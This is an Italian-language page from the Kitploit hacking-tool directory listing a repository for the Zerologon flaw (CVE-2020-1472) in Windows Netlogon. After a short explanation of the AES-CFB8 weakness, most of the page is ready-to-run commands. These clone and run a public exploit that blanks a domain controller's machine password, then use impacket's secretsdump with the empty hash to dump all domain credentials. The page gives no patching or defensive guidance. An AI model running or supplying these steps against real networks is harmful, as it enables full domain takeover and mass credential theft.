Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-1472 — [CVE-2020-1472] Escalation dei privilegi nella chiamata al protocollo remoto Netlogon (MS-NRPC) (Zerologon) | Kitploit
Strumenti/GitHubGitHub/murataydemir/cve-2020-1472
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingAutenticazioneRed Teaming
GitHubmurataydemir/cve-2020-1472

CVE-2020-1472

[CVE-2020-1472] Escalation dei privilegi nella chiamata al protocollo remoto Netlogon (MS-NRPC) (Zerologon)

Vedi Repository
1255 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

[CVE-2020-1472] Escalation di privilegi della chiamata al protocollo remoto Netlogon (MS-NRPC) (Zerologon)

L'attacco descritto qui sfrutta i difetti di un protocollo di autenticazione crittografica (uso insicuro di AES-CFB8) che dimostra al Domain Controller (DC) l'autenticità e l'identità di un computer aggiunto al dominio. A causa dell'uso errato di una modalità operativa AES, è possibile falsificare l'identità di qualsiasi account computer (incluso quello dello stesso DC) e impostare una password vuota (semplicemente inviando una serie di messaggi Netlogon in cui vari campi sono riempiti con zeri) per quell'account nel dominio. Questo può poi essere utilizzato per ottenere le credenziali di amministratore di dominio e quindi ripristinare la password originale del DC.

Per verificare CVE-2020-1472

  • git clone https://github.com/SecuraBV/CVE-2020-1472.git
  • cd CVE-2020-1472
  • python3 -m venv env
  • source env/bin/activate
  • pip install -r requirements.txt
  • python zerologon_tester.py EXAMPLE-DC 1.2.3.4 (esempio: ./zerologon_tester.py DC01 172.16.208.161)

Per sfruttare CVE-2020-1472

  • git clone https://github.com/dirkjanm/CVE-2020-1472.git
  • cd CVE-2020-1472
  • python3 -m venv env
  • source env/bin/activate
  • python cve-2020-1472-exploit.py EXAMPLE-DC 1.2.3.4 (esempio: ./cve-2020-1472-exploit.py DC01 172.16.208.161)
  • git clone https://github.com/SecureAuthCorp/impacket.git
  • cd impacket
  • pip install .
  • python setup.py install
  • cd examples

Quindi, esegui uno dei seguenti comandi

Formato di esempio 1: python secretsdump.py domain/example-dc$@fqdn-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
Formato di esempio 2: python secretsdump.py domain/example-dc$@ip-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc

Immagine della PoC

Il post originale del blog è disponibile qui
Il repository originale che include lo script di test Python è disponibile qui
Il repository originale che include lo script di exploit Python è disponibile qui

Scarica lo strumento